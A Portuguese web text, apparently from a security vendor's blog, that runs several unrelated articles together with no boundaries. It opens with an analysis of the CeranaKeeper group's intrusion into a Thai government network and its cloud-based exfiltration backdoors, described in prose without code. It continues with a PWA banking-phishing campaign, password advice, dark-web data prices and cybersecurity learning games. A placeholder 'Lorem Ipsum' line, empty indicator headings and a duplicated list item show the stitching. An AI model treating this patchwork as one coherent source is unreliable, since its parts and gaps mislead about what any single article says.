Embora algumas atividades do CeranaKeeper tenham sido anteriormente atribuídas ao grupo Mustang Panda (também conhecido como Earth Preta ou Stately Taurus) por empresas como Talos, Trend Micro a Unidade 42 da Palo Alto Networks, decidimos rastrear esse conjunto de atividades como obra do CeranaKeeper. Acreditamos que o CeranaKeeper utiliza um conjunto de ferramentas documentado publicamente, chamado “bespoke stagers” (ou TONESHELL), e depende amplamente da técnica de side-loading, além de empregar uma sequência específica de comandos para exfiltrar arquivos de redes comprometidas. Consideramos ainda que o uso de iscas políticas e componentes PlugX seja responsabilidade do Mustang Panda. Apesar de algumas semelhanças nas atividades dos dois grupos (como objetivos similares com side-loading e formato de arquivo), observamos claras diferenças organizacionais e técnicas entre eles, incluindo distinções nas ferramentas utilizadas, na infraestrutura, nas práticas operacionais e nas campanhas. Também identificamos diferenças na maneira como ambos realizam tarefas semelhantes.

Em suas operações, o CeranaKeeper utiliza componentes conhecidos como TONEINS, TONESHELL e PUBLOAD, exclusivos do grupo. O grupo se destaca por sua criatividade e adaptabilidade nos ataques, como o uso de versões renovadas desses componentes e o desenvolvimento de novas ferramentas que exploram serviços como Pastebin, Dropbox, OneDrive e GitHub. Detalhamos essas ferramentas na seção “Conjunto de ferramentas de apoio à exfiltração em massa”.

Além disso, o grupo deixou alguns metadados em seu código, que nos forneceram informações sobre seu processo de desenvolvimento, consolidando ainda mais nossa separação entre os dois grupos e nossa atribuição ao CeranaKeeper. É possível que ambos os grupos dependam de uma mesma terceira parte, como um fornecedor de ferramentas usadas na fase de implantação, algo comum entre grupos alinhados com a China, ou que exista algum nível de compartilhamento de informações entre eles, o que explicaria as conexões observadas. Em nossa opinião, essa é uma explicação mais provável do que a de um único grupo de cibercriminosos mantendo dois conjuntos completamente separados de ferramentas, infraestrutura, práticas operacionais e campanhas.

Equipamentos comprometidos na mesma rede

Ainda não foram identificados os vetores de comprometimento que o CeranaKeeper utilizou no caso que analisamos. Quando o grupo conseguiu se infiltrar na rede de um orgão governamental tailandesa, em meados de 2023, uma máquina comprometida realizou ataques de força bruta contra um servidor controlador de domínio da rede local.

Após obter acesso privilegiado, os atacantes instalaram a backdoor TONESHELL, implementaram uma ferramenta para despejo de credenciais e utilizaram um driver legítimo da Avast, juntamente com um aplicativo personalizado, para desativar os produtos de segurança da máquina. A partir desse servidor comprometido, usaram um console de administração remota para implantar e executar seu backdoor em outros computadores da rede. Além disso, o CeranaKeeper transformou o servidor comprometido em um servidor de atualizações, armazenando atualizações da TONESHELL nele.

O grupo também distribuiu um novo script BAT pela rede, expandindo seu alcance para outras máquinas no mesmo domínio, explorando o controlador de domínio para obter privilégios de administrador de domínio. Isso permitiu ao CeranaKeeper avançar para a próxima fase de sua operação, atingindo seu objetivo final: a coleta massiva de dados.

Conjunto de ferramentas para a exfiltração massiva

Após implantar sua backdoor TONESHELL e realizar alguns movimentos laterais, parece que os atacantes encontraram e selecionaram alguns computadores comprometidos que despertaram interesse suficiente para implantar ferramentas personalizadas previamente não documentadas. Essas ferramentas de suporte foram utilizadas não apenas para facilitar a exfiltração de documentos para serviços de armazenamento públicos, mas também para atuar como portas dos fundos alternativas. O backdoor e as ferramentas de exfiltração que descrevemos foram implantadas exclusivamente em máquinas muito específicas.

WavyExfiller: Um uploader em Python que explora Dropbox e PixelDrain

O primeiro de uma série de componentes desconhecidos que descobrimos em junho de 2023 é o WavyExfiller, um pacote em Python empacotado em um executável por meio do PyInstaller e uma implementação direta em Python do método de exfiltração descrito pela Unidade 42. Chamamos esse componente de WavyExfiller devido à extensão .wav de um arquivo local que contém máscaras de busca para identificar e compactar documentos prontos para exportação. O executável incluído no PyInstaller é chamado SearchApp.exe (SHA-256: E7B6164B6EC7B7552C93713403507B531F625A8C64D36B60D660D66E82646696).

O módulo possui três funções principais: recuperar um token criptografado do Dropbox a partir de uma página do Pastebin (um serviço on-line para armazenar e compartilhar dados em texto simples), criar arquivos protegidos por senha de documentos encontrados nos diretórios dos usuários e enviar esses arquivos para o Dropbox.

Em outubro de 2023, observamos uma variante (SHA-256: 451EE465675E674CEBE3C42ED41356AE2C972703E1DC7800A187426A6B34EFDC) armazenada sob o nome oneDrive.exe. Apesar do nome, essa versão utiliza o serviço de compartilhamento de arquivos PixelDrain para filtrar os arquivos comprimidos. Assim como o SearchApp.exe mencionado anteriormente, essa variante verifica a unidade C, que normalmente contém o sistema operacional, os programas instalados e os documentos dos usuários locais. Além disso, o oneDrive.exe tenta coletar arquivos das unidades atribuídas, caso existam, que vão da letra D à letra N (exceto a L), como ilustrado na figura 1, o que pode representar dispositivos de armazenamento externos conectados, como USB e discos rígidos, unidades de rede em um ambiente de escritório ou unidades virtuais criadas por um software específico. Isso demonstra que o CeranaKeeper aumentou seu nível de avareza e tentou acessar outras fontes de informação potenciais ou conhecidas. No entanto, não está claro se a operação de exfiltração teve sucesso, já que a verificação dos arquivos carregados no PixelDrain não é possível por meio da API exposta.

DropboxFlop: Um backdoor Python que se aproveita do Dropbox

Em outubro de 2023, mais ou menos ao mesmo tempo em que encontramos a variante do PixelDrain, descobrimos um novo executável incluído no PyInstaller com hash SHA-256 DAFAD19900FFF383C2790E017C958A1E92E84F7BB159A2A7136923B715A4C94F. Parece que o CeranaKeeper o criou com base em um projeto disponível publicamente chamado Dropflop, que é um shell reverso com capacidades de upload e download. O arquivo Python compilado é chamado dropboxflop.pyc. O backdoor recupera um token criptografado do Dropbox e depende dos arquivos presentes no repositório remoto do Dropbox para executar comandos na máquina. Ele cria uma pasta única localmente e gera um “pulso” atualizando o arquivo remoto chamado lasttime a cada 15 segundos. Além disso, procura por um arquivo chamado tasks que, se encontrado, é baixado e analisado como um arquivo JSON. Há dois tipos de tarefas implementadas: execução de comandos e upload de arquivos. Uma vez concluídas, a backdoor envia os resultados atualizando o conteúdo do arquivo de saída.

OneDoor: Um backdoor C++ que se aproveita do OneDrive

Poucos dias depois de implantar o backdoor Python DropboxFlop, o CeranaKeeper voltou com um backdoor C/C++ estáticamente vinculado que explora o OneDrive, a qual denominamos OneDoor. A amostra (SHA-256: 3F81D1E70D9EE39C83B582AC3BCC1CDFE038F5DA31331CDBCD4FF1A2D15BB7C8) é chamada de OneDrive.exe. O arquivo imita o executável legítimo da Microsoft, como mostrado na visualização de propriedades da Figura 2.

O OneDoor se comporta de maneira semelhante ao backdoor DropboxFlop, mas utiliza a API REST do OneDrive da API Graph da Microsoft para receber comandos e filtrar arquivos.

O OneDoor cria um arquivo de log e tenta acessar um arquivo chamado config.ini. Se não estiver presente, o OneDoor utiliza um buffer codificado. O arquivo ou buffer começa com uma chave e um vetor de inicialização, que são usados para descriptografar o restante dos dados usando AES-128 em modo CBC. O texto em claro contém uma URL, que o malware utiliza em uma solicitação HTTP GET. A resposta contém um token do OneDrive, que é usado em solicitações posteriores ao Microsoft OneDrive.

O OneDoor também recupera o ID de uma pasta chamada approot, que é utilizada para armazenar dados do aplicativo.

De forma semelhante ao arquivo config.ini, o malware tenta acessar um arquivo chamado errors.log. Se o arquivo não existir, utiliza um buffer codificado. O conteúdo do arquivo ou buffer é descriptografado; os dados em texto claro contêm uma chave pública RSA de 1024 bits. Um par chave-IV é gerado, criptografado com RSA e carregado na pasta approot remota. Este par é utilizado para criptografar e descriptografar os dados.

Por fim, o malware recupera listas de arquivos de duas pastas localizadas no OneDrive, E e F. Um thread é iniciado para cada lista, que baixa e descriptografa os arquivos. Os arquivos armazenados na pasta E contêm comandos que devem ser executados, enquanto os armazenados na pasta F contêm uma lista de arquivos que devem ser carregados. Os resultados dessas operações são criptografados e armazenados em uma terceira pasta do OneDrive, D. Em seguida, os arquivos originais são excluídos do OneDrive.

BingoShell: Um backdoor Python que explora o GitHub

Observamos o último espécime do conjunto de ferramentas de exfiltração do grupo em fevereiro de 2024 e o denominamos BingoShell por causa da cadeia bingo# utilizada no título de um pull request (PR) do GitHub que ele cria. A amostra analisada (SHA-256: 24E12B8B1255DF4E6619ED1A6AE1C75B17341EEF7418450E661B74B144570017) é um arquivo chamado Update.exe, que utiliza um logotipo do Microsoft Office como ícone, conforme mostrado na figura 3. De acordo com sua marca de tempo de compilação PE, aparentemente foi criado no final de janeiro de 2024.

BingoShell é um backdoor escrito em Python que utiliza o GitHub para controlar máquinas comprometidas. Uma vez executado, ele usa um token codificado para acessar um repositório privado do GitHub. De acordo com o commit inicial da branch principal, o repositório foi provavelmente criado em 24 de janeiro de 2024. BingoShell cria uma nova branch no repositório e o correspondente pull request. O backdoor lê os comentários no PR recém-criado para receber comandos a serem executados na máquina comprometida, como ilustrado na Figura 4.

Isso demonstra uma nova técnica encoberta para aproveitar o GitHub como servidor de comando e controle (C&C), mostrando a sofisticação dos atacantes, que se limparam depois, fechando pull requests e removendo comentários do repositório.

Cada nova branch criada pelo BingoShell no repositório privado do GitHub deve representar um acesso a uma máquina comprometida. Como descobrimos 25 pull requests fechados (mostrados na Figura 5), pudemos deduzir que CeranaKeeper tinha acesso, através do BingoShell, a 25 máquinas comprometidas.

Conclusão

CeranaKeeper, grupo cibercriminoso por trás dos ataques ao governo tailandês, parece especialmente implacável, pois o conjunto de ferramentas e técnicas que o grupo utiliza continua evoluindo rapidamente. Os operadores escrevem e reescrevem seu conjunto de ferramentas conforme as necessidades de suas operações e reagem com bastante rapidez para continuar evitando a detecção. O objetivo deste grupo é colher o máximo de arquivos possível e, para isso, desenvolvem componentes específicos. CeranaKeeper utiliza a nuvem e serviços de compartilhamento de arquivos para a exfiltração e provavelmente se baseia no fato de que o tráfego para esses serviços populares na maioria das vezes pareceria legítimo, tornando mais difícil seu bloqueio quando identificado.

Ao longo de nossa pesquisa, pudemos estabelecer fortes conexões entre os conjuntos de ferramentas previamente documentados e os novos, e um grupo comum. A revisão das táticas, técnicas e procedimentos (TTP), do código e das discrepâncias de infraestrutura nos leva a acreditar que é necessário rastrear CeranaKeeper e MustangPanda como duas entidades separadas. No entanto, ambos os grupos alinhados com a China podem estar compartilhando informações e um subconjunto de ferramentas por um interesse comum ou por meio do mesmo terceiro.

A campanha seletiva que investigamos nos forneceu informações sobre as operações do CeranaKeeper e é provável que futuras campanhas nos revelem mais, já que a busca por dados sensíveis por parte do grupo continua.

Para uma análise mais detalhada das ferramentas implantadas pelo CeranaKeeper, você pode acessar o relatório completo da equipe de pesquisa da ESET aqui.

IoCs

Você pode encontrar uma lista completa de indicadores de comprometimento (IoCs) e amostras em nosso repositório no GitHub.

Arquivos

Rede

Técnicas ATT&CK do MITRE

Esta tabela foi elaborada utilizando a versão 15 do framework MITRE ATT&CK.

A equipe de pesquisa da ESET descobriu uma série de campanhas de phishing direcionadas a usuários de smartphones e tablets usando três mecanismos diferentes de entrega de URL. Esses mecanismos incluem chamadas de voz automatizadas, mensagens SMS e malvertising em redes sociais.

A entrega da chamada de voz é feita por meio de uma ligação automatizada que avisa o usuário sobre um aplicativo bancário desatualizado e solicita que o usuário selecione uma opção no teclado numérico. Depois de pressionar o botão correto, uma URL de phishing é enviada por SMS. Isso foi reportado por Michal Bláha em uma publicação na rede social X (antigo Twitter).

A entrega inicial do SMS foi realizada por meio do envio de mensagens indiscriminadas para números de telefone tchecos. A mensagem enviada incluía um link de phishing e um texto para que as vítimas fizessem engenharia social e acessassem o link.

A propagação por meio de anúncios maliciosos foi feita registrando anúncios em plataformas Meta, como Instagram e Facebook. Esses anúncios incluíam uma chamada para ação, como uma oferta limitada para usuários que “baixassem uma atualização abaixo”. Essa técnica permite que os cibercriminosos especifiquem o público-alvo por idade, gênero etc. Os anúncios seriam então exibidos nas redes sociais das vítimas.

Depois de abrir a URL fornecida no primeiro estágio, as vítimas do Android são confrontadas com uma página de phishing de alta qualidade que imita a página oficial da loja do Google Play para o aplicativo bancário visado ou um site imitador do aplicativo. Essas são duas campanhas diferentes. É possível que a campanha que usa imagens do Google Play se modifique com base no User-Agent recebido para imitar as imagens da Apple Store. Não observamos essa técnica nos casos analisados.

A partir daí, as vítimas são solicitadas a instalar uma “nova versão” do aplicativo bancário; um exemplo disso pode ser visto na Figura 2. Dependendo da campanha, clicar no botão instalar/atualizar inicia a instalação de um aplicativo malicioso do site diretamente no telefone da vítima, seja como um WebAPK (somente para usuários do Android) ou como um PWA para usuários do iOS e do Android (se a campanha não for baseada em WebAPK). Essa etapa crucial da instalação contorna os avisos tradicionais dos navegadores para “instalar aplicativos desconhecidos”: esse é o comportamento padrão da tecnologia WebAPK do Chrome, que é explorado pelos criminosos.

O processo é um pouco diferente para os usuários do iOS, pois uma janela pop-up informa às vítimas como adicionar o PWA de phishing à sua tela inicial (consulte a Figura 3). A janela pop-up copia a aparência das mensagens nativas do iOS. No final, os usuários do iOS nem sequer são avisados sobre a adição de um aplicativo potencialmente prejudicial ao telefone.

Após a instalação, as vítimas são solicitadas a inserir suas credenciais de internet banking para acessar suas contas por meio do novo aplicativo de mobile banking. Todas as informações fornecidas são enviadas para os servidores C&C dos atacantes.

Para saber mais detalhes sobre a pesquisa destacada neste post, confira a publicação em inglês: Be careful what you pwish for – Phishing in PWA applications.

Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.

Uma das primeiras linhas de defesa contra invasões de privacidade e roubo de identidade é uma senha forte e segura. Com a crescente digitalização de nossas vidas, a segurança é uma preocupação cada vez maior. Mas como você pode saber se a sua senha é realmente segura?

O que torna uma senha segura?

Ao criar uma senha forte, é essencial levar em conta vários aspectos que aumentam sua resistência a ataques cibernéticos. Aqui estão alguns pontos importantes:

• Comprimento: o comprimento de uma senha é um fator essencial para sua segurança. Senhas mais longas fornecem uma barreira mais difícil de ser penetrada por ataques de força bruta, em que os hackers tentam todas as combinações possíveis para obter acesso a uma conta. Recomenda-se que as senhas tenham pelo menos 12 caracteres, mas quanto mais longas, melhor. Uma senha com 20 caracteres ou mais é ainda mais segura.
• Complexidade: além do tamanho, a complexidade das senhas desempenha um papel fundamental em sua segurança. Uma senha forte deve incluir uma variedade de caracteres, como letras maiúsculas e minúsculas, números e símbolos especiais como @, #, $, $, % e outros. A inclusão desses elementos aumenta exponencialmente o número de combinações possíveis, tornando a senha muito mais difícil de ser descoberta.
• Aleatoriedade: evite padrões previsíveis ou sequências óbvias. As senhas compostas por palavras comuns, nomes de pessoas, datas de nascimento ou cadeias de caracteres como “123456” ou “qwerty” são extremamente vulneráveis a ataques. Opte por senhas geradas aleatoriamente ou crie suas próprias combinações que não tenham nada a ver com informações pessoais.
• Diversidade: é tentador usar a mesma senha para várias contas – afinal, é mais fácil de lembrar. No entanto, essa prática é muito arriscada. Se uma senha for comprometida em uma conta, todas as outras contas que compartilham essa senha ficarão vulneráveis. Portanto, você deve usar senhas diferentes para cada conta on-line.

Manter esses princípios em mente fortalecerá significativamente a segurança de suas contas on-line, reduzirá o risco de vazamentos e protegerá suas informações pessoais.

Um gerenciador de senhas pode ajudar você a administrar com segurança várias senhas sem a necessidade de memorizá-las. Essas ferramentas permitem que você armazene várias senhas com segurança. Além disso, muitos gerenciadores de senhas oferecem recursos para gerar senhas automaticamente, eliminando a necessidade de criá-las manualmente.

Como você adiciona segurança às suas contas?

Além de criar senhas fortes, há várias outras medidas que você pode adotar para reforçar a segurança e proteger suas informações pessoais, como a autenticação de dois fatores (2FA).

A autenticação de dois fatores é uma camada adicional de segurança que exige não apenas a sua senha, mas também um segundo método de verificação, como um código enviado para o seu celular ou gerado por um aplicativo de autenticação. Ao ativar a 2FA, você dificulta o acesso não autorizado, mesmo que a senha seja comprometida.

Manter as senhas atualizadas também contribui para a segurança

É importante não apenas criar senhas fortes, mas também atualizá-las regularmente. Isso é especialmente importante se você suspeitar que suas contas possam ter sido comprometidas. Ao alterá-las regularmente, você reduz o tempo de exposição no caso de um vazamento de segurança.

Conclusão

Em um mundo em que a segurança digital é uma prioridade máxima, tomar essas medidas adicionais de proteção é essencial para garantir a segurança de suas contas e informações pessoais. Ao seguir essas diretrizes e práticas recomendadas, você pode navegar na Internet com mais confiança, sabendo que suas contas on-line estão protegidas contra ameaças cibernéticas.

Conteúdo atualizado em 03/05/2024.

Digitar uma senha para acessar uma das dezenas de serviços que usamos tornou-se uma parte tão cotidiana de nossas vidas que raramente pensamos nisso.

Tentamos manter nossas senhas simples e fáceis de lembrar para que possamos passar rapidamente pelo processo de login e continuar com o que estamos fazendo.

Esse é um dos muitos erros que cometemos quando se trata de algo em que confiamos para proteger uma parte de nossa identidade digital. Neste post, separamos os 5 erros mais comuns na hora de criar uma senha.

1. Reutilizar senhas

Um dos erros mais comuns é, sem dúvida, a reutilização de senhas. Na maioria das vezes, as pessoas se preocupam em criar senhas fáceis de lembrar, que geralmente são curtas e simples, embora a maioria dos serviços tenha requisitos para a digitação de uma senha e exija um comprimento mínimo e a inclusão de alguns caracteres que adicionam um pouco mais de complexidade.

Depois que memorizamos a senha e nos inscrevemos em um novo serviço, e depois em outro, e em outro, não queremos ter de lembrar uma senha para cada um desses serviços.

É nesse ponto que muitos usuários decidem reutilizar a senha que conseguiram guardar na memória. De acordo com uma pesquisa de 2019 realizada pelo Google, 52% reutilizam a mesma senha em várias contas, enquanto surpreendentes 13% usam a mesma senha para todas as contas.

A substituição de letras por números ou de letras minúsculas por maiúsculas e vice-versa também é considerada reutilização de senha, embora alguns possam argumentar que é uma pequena melhoria.

O problema mais sério da reutilização de senhas é que os usuários ficam expostos ao que é conhecido como credential stuffing. O que é isso? Uma forma de roubo de credenciais que busca assumir o controle das contas dos usuários e usa bots que tentam fazer login usando dados de login que foram expostos em vazamentos de dados sofridos por outros sites; até que eles consigam encontrar a combinação certa em uma nova página web em que as mesmas credenciais de login vazadas foram usadas. Portanto, é melhor diversificar as senhas.

2. Criar senhas simples

As senhas simples geralmente são as senhas mais usadas. Uma lista das senhas mais usadas é publicada todos os anos e mostra que, quando se trata de senhas, as pessoas fazem escolhas altamente questionáveis, com “12345” e “password” no topo da classificação.

Além de padrões simples e palavras óbvias, um erro comum que você pode estar cometendo ao criar senhas é usar detalhes pessoais como parte delas, tornando-as fáceis de adivinhar ou encontrar.

De acordo com a pesquisa do Google citada acima, seis em cada dez adultos nos Estados Unidos usam um nome (próprio, do cônjuge, dos filhos ou do animal de estimação) ou uma data de aniversário em suas senhas. O ideal é que você use uma frase secreta como senha.

A autenticação de dois fatores (2FA) também deve ser ativada sempre que possível, pois acrescenta uma camada adicional de segurança contra vários tipos de ataques que tentam revelar as credenciais de login.

3. Armazenar senhas em texto simples

Outro erro comum é anotar nossas senhas. Isso ocorre de duas formas: senhas escritas em papel ou em notas adesivas, ou armazenadas em planilhas ou documentos de texto em nosso computador ou smartphone.

No primeiro caso: a menos que o cibercriminoso queira adicionar a entrada forçada em uma casa ao seus antecedentes, não há como ele obter acesso a elas. De qualquer forma, se ele optar por essa opção, as anotações devem ter pistas que ajudem a lembrar delas e devem ser armazenadas em um local protegido de olhares indiscretos.

No segundo caso, se você armazenar as chaves em um dos seus dispositivos, ficará exposto se um invasor obtiver acesso ao seu dispositivo e bisbilhotar. Com pouco esforço, você terá acesso a uma grande quantidade de credenciais.

Além disso, se o dispositivo for comprometido por um malware que copia seus dados e os envia para um servidor remoto, um cibercriminoso poderá acessar todas as suas contas antes que você perceba.

Claramente, armazenar senhas em texto simples em qualquer dispositivo conectado é uma má ideia.

4. Compartilhar senhas

Embora compartilhar seja um ato de generosidade, o compartilhamento de senhas não é recomendado. Entretanto, algumas pessoas discordam: 43% dos entrevistados em uma pesquisa nos EUA admitiram ter compartilhado suas senhas com outra pessoa. Mais da metade dos entrevistados disse ter compartilhado suas senhas com entes queridos, incluindo senhas de serviços de streaming, e-mail, redes sociais e até mesmo para acessar contas de compras on-line.

Embora o compartilhamento de uma senha para acessar uma conta de serviço de streaming seja um fenômeno generalizado, ele é menos perigoso do que as outras opções mencionadas.

Depois de compartilhar a senha, você não pode ter certeza de como a outra pessoa lidará com a senha e se ela a compartilhará com outra pessoa. Muito depende de como você compartilhou a senha: a escreveu em sua conta e a salvou ou talvez a tenha enviado por e-mail ou por um aplicativo de mensagens instantâneas em formato de texto simples?

Por exemplo, se você compartilhar suas credenciais de login em uma plataforma de compras, a pessoa a quem você confiou poderá fazer login com sua identidade, os métodos de pagamento serão salvos e ela poderá usar as informações para fazer uma transação sem sua autorização.

5. Alterar senhas periodicamente (sem pensar muito sobre isso)

Algumas organizações obrigam os usuários a alterar suas senhas a cada dois ou três meses “por motivos de segurança”. Mas, ao contrário da crença popular, alterar a senha regularmente, sem evidências de que ela tenha sido exposta em um vazamento de dados, não torna sua conta mais segura.

Estudos mostram que, quando as pessoas são forçadas a alterar suas senhas com frequência, elas não pensam muito sobre isso.

Pesquisadores da Universidade da Carolina do Norte (UNC), nos Estados Unidos, descobriram que os usuários tendem a criar senhas que seguem padrões previsíveis que eles chamam de transformações, que consistem em alterar muito pouco a senha: substituir uma letra por um símbolo semelhante, adicionar ou remover um caractere especial ou alterar a ordem de um ou dois caracteres.

Isso facilita bastante o trabalho dos atacantes, pois, se os cibercriminosos souberem uma senha, eles poderão adivinhar essas transformações com pouco esforço.

Deve-se acrescentar também que, quando os cibercriminosos obtêm acesso ao seu dispositivo, eles podem instalar um keylogger para rastrear as senhas sempre que você as altera.

Ter uma solução de segurança instalada no seu dispositivo aumentará as chances de um keylogger ser detectado e desativado.

Conclusão

Uma senha que atenda a todas as condições pode parecer uma tarefa assustadora, mas há várias maneiras de criá-la sem que você se torne algo tão complexo.

O uso de uma frase secreta, por exemplo, é preferível a uma senha simples, e adicionar uma camada extra de segurança ativando a autenticação de dois fatores em todos os serviços disponíveis deve ser a norma.

Se você acha tedioso lembrar todas as senhas exclusivas que criou, um gerenciador de senhas pode ser a solução, pois será necessário lembrar apenas uma senha que, é claro, deve seguir as sugestões que mencionamos neste post.

Embora em outras publicações tenhamos explicado sobre o mercado de phishing as a service na dark web e na clear web ou sobre os produtos e serviços oferecidos por cibercriminosos nessa zona da Internet, outras questões relacionadas surgem nessa órbita, como, por exemplo, quanto nossas informações realmente valem na dark web, quais fatores influenciam seu preço e como podemos descobrir quanto elas valem na dark web? E, o mais importante, como podemos nos proteger desse contexto criminoso?

Quanto valem suas informações?

O valor das informações na Dark Web varia de acordo com uma série de fatores, incluindo a raridade, a qualidade e a demanda pelos dados. Um número de cartão de crédito ativo com um limite de crédito alto e sem alertas de fraude associados, por exemplo, pode valer muito mais do que um número expirado ou bloqueado.

As informações pessoais completas de uma pessoa, incluindo nome, endereço, data de nascimento, número de INSS e detalhes do cartão de crédito, podem ser extremamente valiosas para cibercriminosos que buscam cometer fraude de identidade ou realizar atividades criminosas se fazendo passar pela vítima.

Fatores que influenciam o preço dos dados na Dark Web

Tipo de informação:

Dados financeiros, como números de cartão de crédito e credenciais bancárias, tendem a ter um valor mais alto do que outros tipos de informações, como endereços de e-mail ou nomes de usuário.

Qualidade e atualização:

A qualidade e a atualização das informações são fundamentais. Dados atualizados e válidos são mais valiosos do que dados desatualizados ou incorretos.

Demanda do mercado:

A demanda do mercado também desempenha um papel importante. Se houver uma alta demanda por determinados tipos de dados, seu preço tende a aumentar.

Risco de exposição:

O risco associado à aquisição e à venda de determinados dados também pode influenciar seu preço. Por exemplo, as informações que podem ser facilmente rastreadas até sua fonte podem ter um valor bem menor devido ao maior risco de exposição para o comprador e o vendedor.

Valores reais dos dados na Dark Web

Embora o valor das informações dependa em grande parte dos fatores mencionados acima, esses preços serão relativizados de acordo com a identidade e/ou a instituição sobre a qual as informações são procuradas, pois as informações de uma pessoa pública não têm o mesmo valor que os dados de alguém comum. Todas essas são diversas variáveis que podem fazer com que os preços caiam ou subam, no entanto, alguns estudos, como os da NordVpn, parametrizaram essas informações para pessoas comuns e obtiveram os seguintes resultados:

• Tipo de informação: Os dados mais valorizados incluem:
• Informações financeiras: números de cartão de crédito, números de contas bancárias, detalhes do PayPal, etc. (entre 5.000 kz e 80.000 kz);
• Credenciais de login: senhas de redes sociais, serviços de streaming, e-mail, etc. (entre 800 kz e 59.000 kz);
• Documentos de identidade: carteiras de identidade, passaportes, carteiras de motorista (entre 3.960 kz e 19.803 kz);
• Registros médicos: registros de saúde, informações de convênios de saúde (entre 792 kz e 23.764 kz).

Como você pode se proteger?

Dada a crescente prevalência dos vazamentos de dados e roubo de identidade, proteger nossas informações pessoais tornou-se uma tarefa essencial para nossa saúde digital:

• Use senhas fortes e exclusivas para todas as suas contas;
• Ative a autenticação de dois fatores sempre que possível;
• Tome cuidado com sites e e-mails suspeitos que solicitem seus dados pessoais;
• Mantenha seus softwares e sistemas operacionais atualizados com as medidas de segurança mais recentes;
• Use um antivírus e um firewall para proteger seu dispositivo;
• Esteja ciente dos golpes de phishing e de outras técnicas usadas por cibercriminosos para obter suas informações;
• Compreender o valor de nossas informações e tomar medidas proativas para protegê-las são etapas essenciais na luta contra o cibercrime e o roubo de identidade no mundo digital de hoje.

Lembre-se: suas informações pessoais são valiosas. Protegê-las é sua responsabilidade.

Os jogos têm se tornado uma ferramenta altamente eficaz na educação, e sua aplicação na cibersegurança não é exceção. No mundo cada vez mais digitalizado em que vivemos, a proteção contra ameaças cibernéticas se tornou uma prioridade.

Desempenhando um papel transformador, jogos podem proporcionar uma abordagem inovadora e envolvente para aprender sobre cibersegurança. Ao mesclar interatividade e desafios práticos, oferecem um ambiente educacional dinâmico moldando uma nova geração.

Os desafios e ameaças no cenário cibernético são inúmeros e estão em constante evolução. A cibersegurança não é apenas uma preocupação para especialistas, mas também uma habilidade essencial para qualquer indivíduo que navegue pelo mundo digital. No entanto, a aprendizagem tradicional de cibersegurança muitas vezes pode ser complexa e teórica, afastando os interessados em potencial.

É aqui que joguinhos entram em cena, oferecendo uma abordagem prática e envolvente que captura a atenção e transforma a experiência de aprendizado em uma jornada estimulante e recompensadora.

OverTheWire

Esta plataforma oferece uma série de jogos de guerra (wargames) online que variam em dificuldade e foco. Cada jogo de guerra apresenta um cenário diferente no qual os jogadores precisam usar suas habilidades técnicas e conhecimento em cibersegurança para resolver desafios e avançar para níveis mais altos.

Alguns jogos populares da OverTheWire incluem “Bandit”, “Narnia”, “Narnia”, “Natasha”, entre outros. Cada um deles concentra-se em áreas específicas da cibersegurança, como exploração de vulnerabilidades, análise de tráfego de rede, quebra de senhas, entre outros.

A própria plataforma indica uma ordem para serem jogados, mas você pode acessar qualquer um no momento que desejar.

TryHackMe

TryHackMe é outra plataforma educacional de cibersegurança que oferece uma variedade de cenários práticos em forma de laboratórios virtuais. Os usuários podem explorar ambientes simulados, como redes, servidores e sistemas, e trabalhar em missões para aprender habilidades de hacking ético e resolução de problemas.

A plataforma fornece tutoriais passo a passo para orientar os usuários através dos desafios, e é indicada tanto para iniciantes quanto para pessoas com conhecimentos mais avançados.

Space Shelter

A colaboração entre a Euroconsumers e a Google resultou no desenvolvimento do “Space Shelter”, um novo jogo online com o propósito de aumentar a conscientização dos consumidores sobre as questões de cibersegurança e promover comportamentos mais responsáveis durante a navegação online.

O jogo “Space Shelter” transforma o aprendizado sobre segurança online em uma emocionante aventura, apresentando gráficos simples, design atraente e qualidade sonora. Os jogadores embarcam em uma jornada composta por cinco mini-jogos, que te levam para seu destino final: o Abrigo Espacial e terão a oportunidade de explorar e compreender os elementos que constituem uma conta de Internet segura.

Desde a utilização de um gerenciador de senhas até a compreensão da autenticação multi caracteres, o jogo abrange diversas configurações de privacidade do consumidor que estão à disposição.

Google Interland

Este jogo, desenvolvido como parte da iniciativa Be Awesome Internet do Google, é voltado principalmente para crianças. A experiência é dividida em quatro aventuras que abordam conceitos fundamentais de cibersegurança de forma simples e intuitiva.

O objetivo principal é capacitar os usuários, especialmente os mais jovens, a evitar armadilhas cibernéticas, reconhecer comportamentos seguros nas redes sociais, gerenciar senhas de forma eficaz e entender como compartilhar informações de maneira responsável.

Cada jogo apresenta uma série de níveis e desafios que os jogadores precisam superar, abordando várias questões cruciais no processo. A abordagem é altamente interativa, proporcionando oportunidades práticas para aplicar o conhecimento adquirido.

Cyber Challenge

Esse é jogo criado pelo Departamento de Defesa dos EUA, convida os jogadores a contribuírem para a resolução de ameaças cibernéticas e a identificarem os papéis que compõem a equipe de guerra cibernética militar.

Com um enfoque envolvente e prático, o Cyber Challenge apresenta uma abordagem única para a aprendizagem, convidando os jogadores a enfrentarem cenários de ameaças cibernéticas em constante evolução.